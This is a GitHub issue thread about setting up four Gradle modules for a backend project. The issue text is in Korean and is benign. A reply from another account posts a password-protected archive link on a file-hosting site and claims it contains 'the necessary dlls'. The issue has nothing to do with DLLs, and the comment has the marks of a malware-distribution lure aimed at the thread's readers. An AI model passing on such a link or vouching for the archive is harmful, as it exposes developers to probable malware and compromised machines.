### ISSUE TITLE
[SETTING] 기본 모듈 설정을 진행합니다. 

### ISSUE THREAD

**Issue by hyunw9** [sopt-makers/sopt-auth-backend-legacy#3]
## About Issue 🚀

프로젝트 진행에 앞서, 모듈 설정을 진행합니다. 
총 모듈은 4가지로 분리하였습니다. 
1. app 
2. domain ( core ) 
3. infra
4. support 

## Progress ✔️

- [ ] 모듈 추가
- [ ] 불필요 파일 제거 (./build 등)
- [ ] settings.gradle.kts에 하위 모듈 추가 
- [ ] build.gradle에 전체 관리 사항 정의 
- [ ] 각 모듈 빈 정상 스캔 확인  
- [ ] 각 모듈 정상 구동 테스트

**Comment by pinpolhoxx** [comment]
I think this will help you.
https://mega.co.nz/#!9jFTnQQa!-IQ1bo74J_ZxbbDvQKSXEj0mCXBuFYX9CK-5y5EV_0A
Pass: changeme
I put the necessary dlls in the archive
